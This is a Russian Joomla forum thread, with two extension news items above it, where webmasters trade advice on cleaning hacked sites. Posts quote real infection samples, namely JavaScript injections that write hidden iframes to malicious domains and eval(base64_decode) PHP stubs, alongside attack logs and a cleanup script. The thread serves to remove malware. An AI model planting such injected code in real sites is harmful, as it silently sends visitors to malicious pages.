Новости Joomla

WT Yandex map items v.2.1.0 модуль для Joomla.Выводит материалы Joomla в виде меток на Яндекс.Карты

WT Yandex map items v.2.1.0 модуль для Joomla.Выводит материалы Joomla в виде меток на Яндекс.Карты

👩‍💻 WT Yandex map items v.2.1.0 модуль для Joomla.Выводит материалы Joomla в виде меток на Яндекс.Карты.v.2.1.0. Что нового?Сохранение последнего вида карты. Добавлены новые опции, позволяющие как для одного экземпляра модуля, так и для всех сохранять на устройстве пользователя последний использованный центр (координаты) и масштаб (zoom) карты. Это позволит открыть карту в том же месте после обновления страницы или при повторном открытии браузера.Определение местоположения пользователя.Модуль может определять местоположение пользователя и центрировать карту на нём. При одновременном использовании с функцией сохранения последнего вида карты определение геопозиции будет срабатывать только в первый раз. В дальнейшем, если обнаружены сохранённые данные центра и масштаба - будут использоваться они.CSS классы для маркеров карты.Всем маркерам карты добавлен CSS-класс wt-yandex-map-items-marker. Для просмотренных маркеров (по которым кликали) добавляется CSS-класс wt-yandex-map-items-marker-viewed, что позволит выделять просмотренные маркеры с помощью стилей в CSS-файлах вашего шаблона. Также для контейнеров маркеров ymaps на карте добавлены data-атрибуты: data-module-id - id модуля и data-marker-id - id маркера.Обработка GET-параметров в URL.Карта может реагировать на GET-параметры в url:- map[zoom] - устанавливает параметр масштаба.- map[center_latitude] и map[center_longitude] - широта и долгота центра карты.- map[marker_id] - id маркера, на котором центрируется карта.Таким образом вы можете создавать ссылку на карту с указанием конкретного маркера, на котором карта сфокусируется после загрузки маркеров. Например, https://site .ru/map?map[marker_id]=18465. Или же ссылку с указанием конкретных координат: https://site .ru/map?map[zoom]=16&map[center_latitude]=51.529706&map[center_longitude]=46.033922Страница расширенияGitHub расширенияВидео-обзор на YoutubeВидео-обзор на VK ВидеоВидео-обзор на Rutube@joomlafeed#joomla #yandex

Вышел Quantum Manager ver.3.2.1 и ver.2.0.5 — Релиз безопасности

Вышел Quantum Manager ver.3.2.1 и  ver.2.0.5 — Релиз безопасности

Вышел Quantum Manager ver.3.2.1 и ver.2.0.5 — Релиз безопасности.В последних версиях Quantum Manager устранены две уязвимости безопасности и исправлено несколько ошибок. Всем пользователям настоятельно рекомендуется обновиться до версии 3.2.1, чтобы обеспечить безопасность и актуальность установки.👩‍💻 Исправлены:1. XSS в SVG-файле. Запрещено выполнение встроенных в SVG скриптов.2. XSS по имени вредоносного файла. Больше никакого выполнения кода через имя файла.Поскольку эти проблемы влияют на безопасность сайта, мы подготовили две версии: одну для Joomla 5 и Joomla 4, а также дополнительную версию для Joomla 3 (предназначенную для устаревшего релиза Quantum Manager 2.0.4, для тех, кто все еще поддерживает сайты на Joomla 3).⚠️ Примечание: обновите Quantum Manager до версии 3.2.1 для Joomla 5 / Joomla 4 и установите Quantum Manager версии 2.0.5 для Joomla 3 (только исправления проблем безопасности).Команда NorrNext благодарит Joomla Security Strike Team и Joomla VEL Team за помощь в обнаружении и исправлении уязвимостей.Читать новостьСкачать@joomlafeed#joomla #расширения

0 Пользователей и 1 Гость просматривают эту тему.
  • 299 Ответов
  • 185070 Просмотров
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
тоже не уверен, тут написано про сканер
еще вижу Ваши познания и плюс то что вы все перепробывали
сканера помогают тем кто хоть малость понимают с чем боряться, и анализируют эту проблему, понимая что к чему
просто так нажал кнопку и все зае... нет и не будет
можете антивирус включить он вам вырежет ненужные файлы, потом увидим топики мол сайт после чистки не работает, в прочем как каждая вторая у тех кто не понимая сами чистят, через месяц-два потраченного времени, обращаются к тем кто разбирается в этой тем
кстати в разделе безопасности много расписано, если нет вашего конкретного случая не отчаиваться, он есть поверти, просто другими файлами и кодом описан, прочитав можно простым анализом напрягая мозг чуть-чуть совсем, понять что искать и как бороться
« Последнее редактирование: 28.03.2013, 12:02:13 от flyingspook »
*

wishlight

  • Гуру
  • 5059
  • 315 / 1
  • От 300 руб быстрый хостинг. Сервера.
Да... Иногда всего лишь чуть-чуть достаточно. Правда если сайтов в аккаунте 100500, тогда ass.
*

SorokinS

  • Захожу иногда
  • 165
  • 12 / 1
Очередное хулигантство и я чет никак не могу вредный код JS засунуть в код реплейсера, подсобите:

Код
<?php
$root  =  $_SERVER['DOCUMENT_ROOT'];
$search = '[b]СЮДА[/b]'; //строка, которую нужно найти в каждом файле и заменить на ''
$thisfile = 'rep.php'; //чтобы в процессе не заменить искомую строку в этом же файле
function find_and_replace($dir,$search,$thisfile)
{

$new_dir = null;
$dir_files = opendir($dir);
    while(false !== ($file = readdir($dir_files)))
    {

        if($file != '.' && $file != '..')
        $new_dir[] = $dir."/".$file;
    }

        if($new_dir)
        foreach($new_dir as $check )
        {
              if((is_file($check)) && (basename($check)!== $thisfile) && ( (strtolower(substr($check,-4)) === '.tpl') || (strtolower(substr($check,-5)) === '.html') || (strtolower(substr($check,-3)) === '.js'))) {
                $handle = fopen($check, "rb");
                $contents = '';
                while (!feof($handle)) {
                  $contents .= fread($handle, 8192);
                }
                fclose($handle);
                if (strpos($contents,$search)!== false) {
                    $file = fopen ($check,"w+");
                    $str = str_replace($search,'',$contents);
                    fputs($file, $str);
                    fclose ($file);
                    echo $check."<br>";
                    }
              }
              elseif(is_dir($check))
              find_and_replace($check,$search,$thisfile);
        }
}
find_and_replace($root,$search,$thisfile);


JS код заражения:

Код
/*214afaae*/(function(){
function stripos (f_haystack, f_needle, f_offset) {
 var haystack = (f_haystack + '').toLowerCase();
 var needle = (f_needle + '').toLowerCase();
 var index = 0;
 if ((index = haystack.indexOf(needle, f_offset))!== -1) {
  return index;
 }
 return false;
}
function papirosa(){
 var denyList = ['Chrome'];
 var denyUA = false;
 for (var i in denyList) {
  if (stripos(navigator.userAgent, denyList[i])) {
   denyUA = true;
   break;
  }
 }
 return denyUA;
}
function setCookie(name, value, expires) {
 var date = new Date( new Date().getTime() + expires*1000 );
 document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
 var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
 return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!papirosa()) {
 var cookie = getCookie('b19ad018sc');
 if (cookie == undefined) {
  setCookie('b19ad018sc', true, 292200);
  document.write('<iframe height="116" style="position:absolute;left:-1000px;top:-1000px;" width="116" src="http://jivemessageoriented.ru/iy7yhd.dgaPnykU?default"></iframe>');
 }
};
})();/*eaa795220*/
*

RazarioAgro

  • Захожу иногда
  • 473
  • 4 / 0
А можете по подробнее объяснить для новичков, что значит при сканировании:

String:: confirm(
String:: $_POST[
String:: phpinfo()

Как я понял все файлы кроме этих является вирусами и нужно их удалять либо править. Но а эти файлы String:: confirm(, String:: $_POST[, String:: phpinfo() их тоже нужно проверять либо они в  порядке? И как они класифицируются, переводятся, пост, конфирм и т.д., что все это значит?
*

wishlight

  • Гуру
  • 5059
  • 315 / 1
  • От 300 руб быстрый хостинг. Сервера.
phpinfo()
$_POST

В общем функции php. Проверять надо все.


12.4.4 последний уязвимый NoNumber Framework по заверениям автора. Для тех кому надо.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
все описано на сайте вся работа со сканером
а прочитать топик нет сил надо схватить и объясните что мне делать
сканер сканирует на предмет наличия функций в коде, универсального ни чего нет, сканер еще раз объясню не антивирус, а помощь при поиске, слово сканер Вам что то говорит, все что показывает сканер надо проверять глазиками вот весь принцип работы
сканер показывает не то что это плохо а все что есть т.к. то что плохо можно написать по разному но вхождение переменной ни куда не денется, а код в ней измениться может как угодно

если вам нужна кнопка "сделать все за...." такого нет и не будет
если просто просмотреть и не понять что делать интуитивно или не найти описание, это уже слишком

может чуть грубо но писать каждую неделю ответ на один и тот же вопрос слишком, еще и когда все понятно и описано прежде и не раз
*

ankoch

  • Захожу иногда
  • 498
  • 50 / 1
Присоединяюсь, пока заочно  ^-^ . В общем стучится постоянно какая-то гадость (до 500-700 обращений в час), в логах, примерно такие записи
Код
www.site.ru 37.9.53.57 - - [07/May/2013:18:20:35 +0400] "GET /administrator/index.php HTTP/1.1" 200 7983 "-" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.8.131 Version/11.10" 0
www.site.ru 37.9.53.57 - - [07/May/2013:18:20:36 +0400] "POST /administrator/index.php HTTP/1.1" 200 277 "http://www.zernogradinfo.ru/administrator/index.php" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.8.131 Version/11.10" 0
Глянул - это какой-то Богдан Шедуляк, страна - Россия:
Спойлер
[свернуть]

Запретил его в htaccess Deny from 37.9.53.57 - пошли у него ошибки 403. Так может чего успел пропихнуть сука? Ответ сервера был 200. Днем проверял всеми способами, которые указаны в этой теме - ничего не нашел.
Joomla 3.1.1, NoNumber нету.
*

icom

  • Давно я тут
  • 830
  • 202 / 4
Очередное хулигантство и я чет никак не могу вредный код JS засунуть в код реплейсера, подсобите:
попробуйте моим скриптом http://secu.ru/scripts/find-and-replace, отметьте "Искать по маске", в "Текст поиска" введите
Код
\/\*214afaae\*\/.*?\/\*eaa795220\*\/
*

0du14ik

  • Новичок
  • 6
  • 0 / 0
Сегодня проверил бесплатной версией этой утилиты один свой сайт. Утилита указала на shell, находящийся в файле статистики, в папке webstat. Эта папка по-умолчанию создаётся в корне хостинга, если у вас используется на хостинге ISPmanager. Получается сам хостер раздаёт shell?
*

Leyzif

  • Осваиваюсь на форуме
  • 19
  • 4 / 0
Просканировала сайт, удалила всю бяку, просмотрела все файлы php на наличие кода, вроде все чисто, но в папке кэша появляются вот такие строки:
public_html/cache/page/11cde0d0b1d50fda1b9521e6fd89d343-cache-page-b4e191dbf08670b2e7f41ddd8e35b87a.php
String:: c99
/cache/page/11cde0d0b1d50fda1b9521e6fd89d343-cache-page-64b03a3c7d1f5fc66bfadf9889844fe9.php
String:: c99
Я так поняла, что это бекдор? Но тогда почему он именно в кэше? В других папках ничего нет. :'(
*

wishlight

  • Гуру
  • 5059
  • 315 / 1
  • От 300 руб быстрый хостинг. Сервера.
Это куски кеша. Почти 100% ничего страшного. Хотя код под спойлер можно выложить.
*

koless88

  • Осваиваюсь на форуме
  • 14
  • 0 / 0
привет всем.
я не профи в кодах. если есть люди добрые, помогите пожалуйста)
взломали сайт на Joomla 1.5. хостеры написали что с моего сайта отсылается спам.
в файле access_log видны запросы, стабильно через какое то время их два
 190.131.111.223 teplocool.ru - - [30/May/2013:23:46:46 +0400] "POST /administrator/language/ru-RU/db.php HTTP/1.1" 404 24098 "-" "Mozilla/5.0" 3916 0
92.160.179.152 teplocool.ru - - [30/May/2013:23:47:50 +0400] "POST /administrator/components/com_jce/cpanel/views/cpanel/tmpl/include.php HTTP/1.1" 404 25376 "-" "Mozilla/5.0" 4972 0
и что еще непонятно, в БД нет такого пути, administrator/components/com_jce/cpanel/views/cpanel/tmpl/include.php. красным отметил папку которой не существует, а вот дальше все есть - views/cpanel/tmpl/include.php
файлы php удалил.  обновил Joomla, обновил компонент com_jce. но запросы продолжаются.  залил в корень файл сканера fls.php но для меня видимо как мартышка и очки)
какие варианты возможны? как излечиться) удлил даже компонент JCE но запросы продолжаются

« Последнее редактирование: 01.06.2013, 23:50:57 от koless88 »
*

Aquasonick

  • Захожу иногда
  • 314
  • 1 / 7
  • Пока семь раз отмеришь - другие уж сожрут.
Цитировать
Просьба к тем кто находит у себя при чистки заразу Shell и BackDoor пишите в ЛС она нам нужна для расширения библиотеки.
завтра накидаю.)
жаль самое интересное снёс уже .)
Цитировать
файлы php удалил.  обновил Joomla, обновил компонент com_jce. но запросы продолжаются.  залил в корень файл сканера fls.php но для меня видимо как мартышка и очки)
какие варианты возможны? как излечиться) удлил даже компонент JCE но запросы продолжаются
У меня часто в images попадаеет файл с форматом php. Проверь на всякий случай.
*

SDKiller

  • Живу я здесь
  • 2706
  • 329 / 5
  • ...ergo sum
У меня часто в images попадаеет файл с форматом php

Проверяйте компоненты, позволяющие загрузку файлов пользователям.
Стандартный com_media и редактор JCE проверяют mime и не пропускают, даже если файлы переименовали для маскировки, назначив расширения .jpg, .png и т.п.
*

Aquasonick

  • Захожу иногда
  • 314
  • 1 / 7
  • Пока семь раз отмеришь - другие уж сожрут.
Проверяйте компоненты, позволяющие загрузку файлов пользователям.
Стандартный com_media и редактор JCE проверяют mime и не пропускают, даже если файлы переименовали для маскировки, назначив расширения .jpg, .png и т.п.
Да я знаю. Они через ftp грузят. Взлом идёт через шел возможно.
*

Aquasonick

  • Захожу иногда
  • 314
  • 1 / 7
  • Пока семь раз отмеришь - другие уж сожрут.
Прверил пару сайтов. Везде примерно одно и тоже:
Спойлер
[свернуть]

Так и не понял. Это подозрение на заражение или по факту там есть вредоносный код? Или это просто так??
*

mysuccess

  • Осваиваюсь на форуме
  • 10
  • 0 / 0
Приветствую всех
Мой (арендуемый) сервер заражен аналогичным вирусом.
Раньше дописывал в js код, который не видел Яндекс.
После сообщений Вебмастера.Яндекса о заражении сайтов, обнаружил много пораженных .php файлов. (index.*, forum.* и др., упомянутые выше)

Помогите разыскать источник заражения. Предпринимавшиеся меры в итоге привели к начальному результату - повторному заражению.
Чистить файлы сканированием можно, но на своем примере скажу: угрозу искоренить не удалось.

Взываю о помощи, прошу совета, где искать источник.
Я уже подумываю о полном переносе сайтов на другой хостинг. А их не мало =(

Выкладываю несколько скриптов (один из js, второй из index.php, а также найденный мной в папке images файл php, на совершенно НОВОМ сайте (в мае запустили).

images/index.php с НОВОГО сайта (cms: cs-shop)
Код
<?php	                                       			eval(base64_decode("..."));
    header('Location: ../index.php');
?>

index.php верхняя строчка кода с самого уважаемого на хостинге сайта (cms: joomla 1.7)
Код
<?php	                                       			eval(base64_decode("..."));
/**
* @version
...

/templates/template/js/template.js Последняя строчка - такую еще не видел - что-то новое блин ((, (cms: joomla 2.5)
Код
})(jQuery);;document.write('<iframe style="position:fixed;top:0px;left:-500px;" height="120" width="120" src="http://vzklg.ddns.name/25d39654ba9eceeda.wnUrSfm6aRHxqpN4?default"></iframe>');
p.s.: [s]тут была раньше белиберда с base64_decode[/s]

очень надеюсь на Ваши мысли, идеи, комментарии и помощь в поиске и удалении источника заражения сайтов на сервере =(
« Последнее редактирование: 06.06.2013, 22:15:06 от flyingspook »
*

Aquasonick

  • Захожу иногда
  • 314
  • 1 / 7
  • Пока семь раз отмеришь - другие уж сожрут.
Вы их так сюда больше не выкладывайте. В эту тему теперь зайти никто не может.))
Мне пришлось антивирус отключать, чтобы вам ответить.))
В общем могу дать только один совет, это попробовать скачать антивирус OSE плюс анти хак OSE и перед этим посканируйте сами файлы, а также то, что ввели попробуйте через replace найти и удалить.
Или готовьте несколько тысяч мастерам.
Я вобщем сам чищу. Пока удачно.
*

mysuccess

  • Осваиваюсь на форуме
  • 10
  • 0 / 0
Прошу прощения за выкладку полного кода вирусов. Кто-то выше постоянно просил показать код здесь. Я решил сразу и показать  8)

Переписывал сайты с хостинга в течение 48 часов подряд  :o (не заархивированные, о чем сейчас жалею - в архиве было бы быстрее)
Вчера всё переписалось   8)
Не подумав перед этим установил антивирус Касперский Кристал
Он ругался при каждом скаченном файле, лечил чего-то и т.д. Я в шоке. Наверно поэтому так долго.

Вот думаю, напортачил ли Каспер с моими файлами. Что мне теперь с ними делать и можно ли их использовать дальше на сервере =((((
Дело в том, что бэкапа до заражения у меня нет аще. Только древний за позапрошлый год))
К тому же, честно признаюсь, я, вероятно, сильно запустил вирусную активность на сервере. Сообщения и первые "ласточки" появлялись еще в конце 2012 года   (чур не падать со стульев ;D)
По начало особо не мешало. Всё работало как надо. А начались действительно серьезные проблемы только спустя 4 месяца (в марте-апреле 2013).
Пишу это тем людям, которые забивают на вирусы как это сделал я и надеются на русский авось)))
Делать так не надо!
Лечитесь сразу

В общем сейчас у меня такая ситуация:
  • Все сайты помечены яндексом как Вирусные.
  • Скачал бэкап, которому доверять не могу на 100% по указанной выше причине.
  • Собираюсь сделать копию баз данных всех сайтов (где там искать - вообще не знаю - подскажите пожалуйста)
  • Пробегусь по скаченному поиском и заменой через Notepad++ или TotalCmd-подобные
  • Просмотрю как можно больше сообщений о вирусной активности, найденной в процессе скачивания сайтов с хостинга Касперским - приму меры.
  • Очередной раз сменю все пароли
  • Уже сменил FTP-клиента (была Filezilla с сохраненным в ней паролем к серверу) стала (Win SCP вроде называется) - пароль не сохраняю.
  • Планирую покупать Касперского Кристал (сейчас стоит демо на 30 дней).
  • Планирую сменить сервер на хостинге (один закрою, другой открою)

Что можно сделать еще ?
Посоветуйте пожалуйста. Я за этим сюда пришел. Спасибо!
*

stardel

  • Завсегдатай
  • 1943
  • 22 / 0
а я вот однаружил на 2.5. в корне какой то файлик robots.txt.dist....вроде нормальное содержимое но от куда он?

# If the Joomla site is installed within a folder such as at
# e.g. www.example.com/joomla/ the robots.txt file MUST be
# moved to the site root at e.g. www.example.com/robots.txt
# AND the Joomla folder name MUST be prefixed to the disallowed
# path, e.g. the Disallow rule for the /administrator/ folder
# MUST be changed to read Disallow: /joomla/administrator/
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/orig.html
#
# For syntax checking, see:
# http://www.sxw.org.uk/computing/robots/check.html

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /logs/
Disallow: /media/
Disallow: /modules/
Disallow: /plugins/
Disallow: /templates/
Disallow: /tmp/

*

voland

  • Легенда
  • 11027
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
*

stardel

  • Завсегдатай
  • 1943
  • 22 / 0
voland можно его удалить? а то мозолит мне глаз он...или как?)
*

voland

  • Легенда
  • 11027
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
*

Ecspert

  • Захожу иногда
  • 426
  • 12 / 0
Какой програмой можно проверить файлы сайта, скачав их на комьютер? Типа (spybot, adware, etc)
*

WebDisaster

  • Захожу иногда
  • 108
  • 12 / 0
Какой програмой можно проверить файлы сайта, скачав их на комьютер? Типа (spybot, adware, etc)
Проверяйте чем хотите - половину проблем не найдёте. Это не Касперский, здесь думать нужно (с) wishlight
Другими словами - никакого универсального и надёжного средства или способа нет и пока не предвидится.
« Последнее редактирование: 12.06.2013, 07:40:25 от WebDisaster »
*

Alukard

  • Захожу иногда
  • 101
  • 1 / 0
Добрый день! Недавно сайт опять начал переадресовывать. Поменял пароль на админку, та ftp. Однако теперь ничего не могу закачать по ftp. Т.е. подключение есть, дерево каталогов я вижу, но при попытку закачки(в данном случае файл со скриптом) FileZila выдает что превышено время ожидания, а сам файл остается в папке с размером 0кб. Подскажите пожалуйста, что делать, или дайте ссылку на тему.
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Поменял пароль на админку, та ftp. Однако теперь ничего не могу закачать по ftp. Т.е. подключение есть, дерево каталогов я вижу, но при попытку закачки(в данном случае файл со скриптом) FileZila выдает что превышено время ожидания, а сам файл остается в папке с размером 0кб.
Нет прав на запись в директорию. Проверяй владельца файлов, и стучи к хостеру.
*

Alukard

  • Захожу иногда
  • 101
  • 1 / 0
Хостер говорит, что с его стороны всё нормально. Опытным путём выяснил, что такая беда происходит, если размер файла больше 2кб(меньше закачивает). В чем может быть дело?
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Обманывает твой хостер. Проверь в админке- Права на папки
*

Alukard

  • Захожу иногда
  • 101
  • 1 / 0
Точно обманывает! Написал им снова, через 2 часа всё норм стало. Говорят у меня проблема с файлзилой была)
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 6
Просмотров: 2500
Последний ответ 31.03.2024, 16:14:32
от SeBun
Компоненты и скрипты для защиты сайта. Логи атак на сайты

Автор wishlight

Ответов: 678
Просмотров: 261293
Последний ответ 14.09.2022, 14:29:43
от wishlight
Способы защиты сайта от DDoS атак?

Автор IgorMJ

Ответов: 7
Просмотров: 2279
Последний ответ 05.10.2021, 21:39:26
от ShopES
Тестирую сайты на уязвимости

Автор SalityGEN

Ответов: 0
Просмотров: 832
Последний ответ 21.08.2021, 23:01:01
от SalityGEN
Новый набег ботов в регистрации сайта... Какой в этом смысл то?

Автор Cedars

Ответов: 11
Просмотров: 1962
Последний ответ 03.11.2020, 17:36:03
от Cedars